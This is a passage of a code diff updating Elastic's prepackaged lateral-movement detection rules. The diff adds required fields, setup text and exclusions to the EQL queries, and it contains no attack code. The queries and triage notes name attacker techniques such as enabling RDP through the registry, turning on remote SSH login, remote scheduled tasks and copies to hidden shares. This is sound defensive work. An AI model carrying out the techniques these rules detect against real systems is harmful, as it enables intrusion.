rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +78,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json index 44fc8cf6592b0..eb4f7cfd68048 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_mounting_smb_share.json @@ -11,14 +11,42 @@ "language": "eql", "license": "Elastic License v2", "name": "Attempt to Mount SMB Share via Command Line", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n )\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n (\n process.name : \"mount_smbfs\" or\n (process.name : \"open\" and process.args : \"smb://*\") or\n (process.name : \"mount\" and process.args : \"smbfs\") or\n (process.name : \"osascript\" and process.command_line : \"osascript*mount volume*smb://*\")\n ) and\n not process.parent.executable : \"/Applications/Google Drive.app/Contents/MacOS/Google Drive\"\n", "references": [ "https://www.freebsd.org/cgi/man.cgi?mount_smbfs", "https://ss64.com/osx/mount.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "661545b4-1a90-4f45-85ce-2ebd7c6a15d0", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json index 39999613b1b3f..be25ac1875fba 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_powershell_remoting_target.json @@ -19,6 +19,48 @@ "references": [ "https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 47, "rule_id": "2772264c-6fb9-4d9d-9014-b416eed21254", "severity": "medium", @@ -47,5 +89,5 @@ } ], "type": "eql", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json index a7f79d5f778bc..df314a441cd6d 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_enabled_registry.json @@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "RDP Enabled via Registry", - "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote\ndesktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether\nthey are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating RDP Enabled via Registry\n\nMicrosoft Remote Desktop Protocol (RDP) is a proprietary Microsoft protocol that enables remote connections to other\ncomputers, typically over TCP port 3389.\n\nAttackers can use RDP to conduct their actions interactively. Ransomware operators frequently use RDP to access\nvictim servers, often using privileged accounts.\n\nThis rule detects modification of the fDenyTSConnections registry key to the value `0`, which specifies that remote\ndesktop connections are enabled. Attackers can abuse remote registry, use psexec, etc., to enable RDP and move laterally.\n\n#### Possible investigation steps\n\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the user to check if they are aware of the operation.\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether it makes sense to enable RDP to this host, given its role in the environment.\n- Check if the host is directly exposed to the internet.\n- Check whether privileged accounts accessed the host shortly after the modification.\n- Review network events within a short timespan of this alert for incoming RDP connection attempts.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Check whether the user should be performing this kind of activity, whether\nthey are aware of it, whether RDP should be open, and whether the action exposes the environment to unnecessary risks.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- If RDP is needed, make sure to secure it using firewall rules:\n - Allowlist RDP traffic to specific trusted hosts.\n - Restrict RDP logins to authorized non-administrator accounts, where possible.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Review the privileges assigned to the involved users to ensure that the least privilege principle is being followed.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "registry where event.type in (\"creation\", \"change\") and\n registry.path : \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Control\\\\Terminal Server\\\\fDenyTSConnections\" and\n registry.data.strings : (\"0\", \"0x00000000\") and not (process.name : \"svchost.exe\" and user.domain == \"NT AUTHORITY\") and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\SystemPropertiesRemote.exe\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "58aa72ca-d968-4f34-b9f7-bea51d75eb50", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json index c4001b6ed88cf..73e12f0e82546 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_rdp_sharprdp_target.json @@ -15,6 +15,63 @@ "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3", "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Lateral%20Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + } + ], "risk_score": 73, "rule_id": "8c81e506-6e82-4884-9b9a-75d3d252f967", "severity": "high", @@ -50,5 +107,5 @@ } ], "type": "eql", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json index f2d2988afdfa2..e40b2743cebf7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_file_copy_hidden_share.json @@ -12,10 +12,28 @@ "language": "eql", "license": "Elastic License v2", "name": "Remote File Copy to a Hidden Share", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"robocopy.exe\", \"xcopy.exe\") and \n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") and process.args : \"*$*\"\n", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : (\"cmd.exe\", \"powershell.exe\", \"robocopy.exe\", \"xcopy.exe\") and\n process.args : (\"copy*\", \"move*\", \"cp\", \"mv\") and process.args : \"*$*\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "fa01341d-6662-426b-9d0c-6d81e33c8a9d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -50,5 +68,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json index 3e7313c43fc8b..eb54d4bf143d7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_services.json @@ -12,7 +12,74 @@ "language": "eql", "license": "Elastic License v2", "name": "Remotely Started Services via RPC", - "query": "sequence with maxspan=1s\n [network where process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and \n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"services.exe\" and \n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and \n not (process.name : \"msiexec.exe\" and process.args : \"/V\")\n \n /* uncomment if psexec is noisy in your environment */\n /* and not process.name : \"PSEXESVC.exe\" */\n ] by host.id, process.parent.entity_id\n", + "query": "sequence with maxspan=1s\n [network where process.name : \"services.exe\" and\n network.direction : (\"incoming\", \"ingress\") and network.transport == \"tcp\" and \n source.port >= 49152 and destination.port >= 49152 and source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ] by host.id, process.entity_id\n\n [process where event.type in (\"start\", \"process_started\") and process.parent.name : \"services.exe\" and \n not (process.name : \"svchost.exe\" and process.args : \"tiledatamodelsvc\") and \n not (process.name : \"msiexec.exe\" and process.args : \"/V\") and\n not process.executable :\n (\"?:\\\\Windows\\\\ADCR_Agent\\\\adcrsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\VSSVC.exe\",\n \"?:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe\",\n \"?:\\\\Windows\\\\System32\\\\svchost.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Windows\\\\PSEXESVC.EXE\",\n \"?:\\\\Windows\\\\System32\\\\sppsvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiApSrv.exe\",\n \"?:\\\\WINDOWS\\\\RemoteAuditService.exe\",\n \"?:\\\\Windows\\\\VeeamVssSupport\\\\VeeamGuestHelper.exe\",\n \"?:\\\\Windows\\\\VeeamLogShipper\\\\VeeamLogShipper.exe\",\n \"?:\\\\Windows\\\\CAInvokerService.exe\",\n \"?:\\\\Windows\\\\System32\\\\upfc.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQ*.exe\",\n \"?:\\\\Windows\\\\System32\\\\vds.exe\",\n \"?:\\\\Windows\\\\Veeam\\\\Backup\\\\VeeamDeploymentSvc.exe\",\n \"?:\\\\Windows\\\\ProPatches\\\\Scheduler\\\\STSchedEx.exe\",\n \"?:\\\\Windows\\\\System32\\\\certsrv.exe\",\n \"?:\\\\Windows\\\\eset-remote-install-service.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\OSCToGPAutoService\\\\OSCToGPAutoSvc.exe\",\n \"?:\\\\Pella Corporation\\\\Pella Order Management\\\\GPAutoSvc.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\NwxExeSvc\\\\NwxExeSvc.exe\",\n \"?:\\\\Windows\\\\System32\\\\taskhostex.exe\")\n ] by host.id, process.parent.entity_id\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.transport", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "aa9a274d-6b53-424d-ac5e-cb8ca4251650", "severity": "medium", @@ -41,5 +108,5 @@ } ], "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json index dc4d84d497097..396dc74e128e2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_remote_ssh_login_enabled.json @@ -11,12 +11,39 @@ "language": "kuery", "license": "Elastic License v2", "name": "Remote SSH Login Enabled via systemsetup Command", - "query": "event.category:process and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on)\n", + "query": "event.category:process and event.type:(start or process_started) and\n process.name:systemsetup and\n process.args:(\"-setremotelogin\" and on) and\n not process.parent.executable : /usr/local/jamf/bin/jamf\n", "references": [ "https://documents.trendmicro.com/assets/pdf/XCSSET_Technical_Brief.pdf", "https://ss64.com/osx/systemsetup.html", "https://support.apple.com/guide/remote-desktop/about-systemsetup-apd95406b8d/mac" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5ae4e6f8-d1bf-40fa-96ba-e29645e1e4dc", "severity": "medium", @@ -39,12 +66,19 @@ { "id": "T1021", "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/" + "reference": "https://attack.mitre.org/techniques/T1021/", + "subtechnique": [ + { + "id": "T1021.004", + "name": "SSH", + "reference": "https://attack.mitre.org/techniques/T1021/004/" + } + ] } ] } ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json index d4d82d7532cbe..4d7c3e098b175 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_scheduled_task_target.json @@ -14,6 +14,48 @@ "name": "Remote Scheduled Task Creation", "note": "## Triage and analysis\n\n### Investigating Remote Scheduled Task Creation\n\n[Scheduled tasks](https://docs.microsoft.com/en-us/windows/win32/taskschd/about-the-task-scheduler) are a great mechanism\nfor persistence and program execution. These features can be used remotely for a variety of legitimate reasons, but at\nthe same time used by malware and adversaries. When investigating scheduled tasks that were set up remotely, one of the\nfirst steps should be to determine the original intent behind the configuration and to verify if the activity is tied to\nbenign behavior such as software installation or any kind of network administrator work. One objective for these alerts\nis to understand the configured action within the scheduled task. This is captured within the registry event data for\nthis rule and can be base64 decoded to view the value.\n\n#### Possible investigation steps\n\n- Review the base64 encoded tasks actions registry value to investigate the task configured action.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software\ninstallations.\n- Further examination should include review of host-based artifacts and network logs from around when the scheduled task\nwas created, on both the source and target machines.\n\n### False positive analysis\n\n- There is a high possibility of benign activity tied to the creation of remote scheduled tasks as it is a general feature\nwithin Windows and used for legitimate purposes for a wide range of activity. Any kind of context should be found to\nfurther understand the source of the activity and determine the intent based on the scheduled task's contents.\n\n### Related rules\n\n- Service Command Lateral Movement - d61cbcf8-1bc1-4cff-85ba-e7b21c5beedc\n- Remotely Started Services via RPC - aa9a274d-6b53-424d-ac5e-cb8ca4251650\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Remove scheduled task and any other related artifacts.\n- Review privileged account management and user account management settings. Consider implementing group policy object (GPO) policies to further\nrestrict activity, or configuring settings that only allow administrators to create remote scheduled tasks.\n", "query": "/* Task Scheduler service incoming connection followed by TaskCache registry modification */\n\nsequence by host.id, process.entity_id with maxspan = 1m\n [network where process.name : \"svchost.exe\" and\n network.direction : (\"incoming\", \"ingress\") and source.port >= 49152 and destination.port >= 49152 and\n source.ip != \"127.0.0.1\" and source.ip != \"::1\"\n ]\n [registry where registry.path : \"HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Schedule\\\\TaskCache\\\\Tasks\\\\*\\\\Actions\"]\n", + "required_fields": [ + { + "ecs": true, + "name": "destination.port", + "type": "long" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "source.port", + "type": "long" + } + ], "risk_score": 47, "rule_id": "954ee7c8-5437-49ae-b2d6-2960883898e9", "severity": "medium", @@ -64,5 +106,5 @@ } ], "type": "eql", - "version": 8 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json index 47ebd1f80e3d1..cd1e658b3f140 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_service_control_spawned_script_int.json @@ -12,10 +12,43 @@ "language": "eql", "license": "Elastic License v2", "name": "Service Control Spawned via Script Interpreter", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "/* This rule is not compatible with Sysmon due to user.id issues */\n\nprocess where event.type == \"start\" and\n (process.name : \"sc.exe\" or process.pe.original_file_name == \"sc.exe\") and\n process.parent.name : (\"cmd.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\",\n \"wmic.exe\", \"mshta.exe\",\"powershell.exe\", \"pwsh.exe\") and\n process.args:(\"config\", \"create\", \"start\", \"delete\", \"stop\", \"pause\") and\n /* exclude SYSTEM SID - look for service creations by non-SYSTEM user */\n not user.id : \"S-1-5-18\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "e8571d5f-bea1-46c2-9f56-998de2d3ed95", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +76,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json index d9d6a0f0ea9d7..10a9f4fdd9ef3 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_suspicious_rdp_client_imageload.json @@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious RDP ActiveX Client Loaded", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "library where dll.name : \"mstscax.dll\" and\n /* depending on noise in your env add here extra paths */\n process.executable :\n (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\mstsc.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\")\n", + "note": "", + "query": "any where (event.category == \"library\" or (event.category == \"process\" and event.action : \"Image loaded*\")) and\n (dll.name : \"mstscax.dll\" or file.name : \"mstscax.dll\") and\n /* depending on noise in your env add here extra paths */\n process.executable :\n (\n \"C:\\\\Windows\\\\*\",\n \"C:\\\\Users\\\\Public\\\\*\",\n \"C:\\\\Users\\\\Default\\\\*\",\n \"C:\\\\Intel\\\\*\",\n \"C:\\\\PerfLogs\\\\*\",\n \"C:\\\\ProgramData\\\\*\",\n \"\\\\Device\\\\Mup\\\\*\",\n \"\\\\\\\\*\"\n ) and\n /* add here FPs */\n not process.executable : (\"C:\\\\Windows\\\\System32\\\\mstsc.exe\", \"C:\\\\Windows\\\\SysWOW64\\\\mstsc.exe\")\n", "references": [ "https://posts.specterops.io/revisiting-remote-desktop-lateral-movement-8fb905cb46c3" ], + "required_fields": [ + { + "ecs": true, + "name": "dll.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "71c5cb27-eca5-4151-bb47-64bc3f883270", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -46,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json index 73dca7c566421..10a577c70d83f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/lateral_movement_telnet_network_activity_external.json @@ -18,6 +18,28 @@ "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + 